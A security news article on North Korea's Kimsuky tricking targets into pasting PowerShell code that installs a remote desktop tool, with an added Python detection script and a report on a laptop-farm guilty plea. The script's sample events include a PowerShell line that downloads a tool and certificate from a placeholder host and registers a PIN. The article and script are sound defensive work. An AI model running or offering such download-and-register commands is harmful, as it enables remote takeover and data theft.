The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that tricks targets into launching PowerShell as an administrator and then instructs them to paste and run malicious code it supplies.
“To carry out this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with the target before sending a spear-phishing email with a PDF attachment,” the Microsoft Threat Intelligence team noted in a series of posts on X.
To read the purported PDF document, victims are persuaded to click a URL containing a list of steps to register their Windows system. The registration link urges them to launch PowerShell as an administrator and to copy and paste a displayed code snippet into the terminal and execute it.
If the victim follows through, the malicious code downloads and installs a browser-based remote desktop tool, along with a certificate file with a hardcoded PIN, from a remote server.
“The code then sends a web request to a remote server to register the victim’s device using the downloaded certificate and PIN. This allows the actor to access the device and carry out data exfiltration,” Microsoft said.
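From a detection standpoint, the chain described above has a recognisable shape: text pasted into an elevated, interactive PowerShell console that downloads content, fetches a certificate and then registers the device. The following triage script is an added example, not code from the article or from Microsoft; it runs over constructed records modelled on PowerShell script-block logging (Event ID 4104, whose Path field is empty for interactively entered text) and flags only sessions matching that combination.

```python
import re

# Constructed sample events modelled on PowerShell script-block logging
# (Event ID 4104): the script text, the Path field (empty when the text was
# typed or pasted interactively rather than run from a .ps1 file), the host
# and whether the host process ran with an elevated token.
# Hosts and file names are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    {"id": 1, "path": "", "host": "ConsoleHost", "elevated": True,
     "script": ("Invoke-WebRequest -Uri https://example.invalid/rd-setup -OutFile $env:TEMP\\rd.exe; "
                "Invoke-WebRequest -Uri https://example.invalid/device.pfx -OutFile $env:TEMP\\device.pfx; "
                "Invoke-WebRequest -Uri https://example.invalid/register -Method Post -Body @{pin=$pin}")},
    # Legitimate admin script run from a file: downloads a certificate but is not interactive.
    {"id": 2, "path": "C:\\ops\\renew-cert.ps1", "host": "ConsoleHost", "elevated": True,
     "script": "Invoke-WebRequest -Uri https://pki.example.invalid/server.cer -OutFile C:\\ops\\server.cer"},
    # Ordinary interactive, non-elevated use.
    {"id": 3, "path": "", "host": "ConsoleHost", "elevated": False,
     "script": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    # Elevated interactive download with no certificate or registration step.
    {"id": 4, "path": "", "host": "ConsoleHost", "elevated": True,
     "script": "Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile tool.zip"},
]

# Text indicators drawn from the behaviour described in the article.
INDICATORS = {
    "web_download": re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|invoke-restmethod", re.I),
    "certificate": re.compile(r"\.(crt|cer|pfx|pem)\b", re.I),
    "pin_or_register": re.compile(r"\bpin\b|register", re.I),
}

def score_event(event):
    """Return the set of indicator names present in the script text."""
    return {name for name, rx in INDICATORS.items() if rx.search(event["script"])}

def is_suspicious(event):
    """Flag an elevated, interactive (no script path) console session whose pasted
    text both downloads content and handles a certificate or a PIN/registration."""
    hits = score_event(event)
    interactive = event["path"] == "" and event["host"] == "ConsoleHost"
    return (interactive and event["elevated"]
            and "web_download" in hits
            and bool(hits & {"certificate", "pin_or_register"}))

def triage(events):
    """Return (id, sorted indicator hits) for events that deserve analyst attention."""
    return [(e["id"], sorted(score_event(e))) for e in events if is_suspicious(e)]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

In a real deployment the elevation flag would come from the process-creation event (4688 or an EDR equivalent) correlated by process id, since 4104 itself does not record it.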
The tech giant said it has observed this approach in limited attacks since January 2025, describing it as a departure from the threat actor’s usual tradecraft.
It is worth noting that Kimsuky is not the only North Korean hacking group to adopt the approach. In December 2024, it was disclosed that the threat actors behind the Contagious Interview campaign were tricking users into copying and executing a malicious command on their Apple macOS systems via the Terminal app, ostensibly to resolve a problem with accessing the camera and microphone through the web browser.
Such attacks, along with those that use the so-called ClickFix method, which has surged in recent months, are attractive partly because they rely on the target infecting their own machine, thereby bypassing security protections.
Arizona woman pleads guilty to running a laptop farm for North Korean IT workers
The development comes as the U.S. Department of Justice (DoJ) said a 48-year-old woman from Arizona has pleaded guilty to her role in a fraudulent IT worker scheme that allowed North Korean operatives to obtain remote jobs at more than 300 U.S. companies by posing as U.S. citizens and residents.
The activity generated more than $17.1 million in illicit revenue for Christina Marie Chapman and for North Korea, in violation of international sanctions, between October 2020 and October 2023, the department said.
“Chapman, a U.S. citizen, conspired with overseas IT workers from October 2020 to October 2023 to steal the identities of U.S. nationals and used those identities to apply for remote IT jobs and, in furtherance of the scheme, submitted false documents to the Department of Homeland Security,” the DoJ noted.
“Chapman and her co-conspirators obtained jobs at hundreds of U.S. companies, including Fortune 500 corporations, often through temporary staffing agencies or other contracting organizations.”
The defendant, who was arrested in May 2024, was also accused of running a laptop farm, hosting multiple laptops at her residence to create the impression that the North Korean workers were working from within the country, when they were actually located in China and Russia and connecting remotely to the companies’ internal systems.
“As a result of Chapman’s conduct and that of her co-conspirators, more than 300 U.S. companies were impacted, more than 70 U.S. identities were compromised, false information was conveyed to DHS on more than 100 occasions, and more than 70 U.S. individuals had false tax liabilities created in their names,” the DoJ added.
Increased law enforcement scrutiny has led to an escalation of the IT worker scheme, with reports of data extortion.
“After being discovered on company networks, North Korean IT workers have extorted victims by holding stolen proprietary data and code hostage until the company meets ransom demands,” the U.S. Federal Bureau of Investigation (FBI) noted in an advisory last month. “In some instances, North Korean IT workers have publicly released victim companies’ proprietary code.”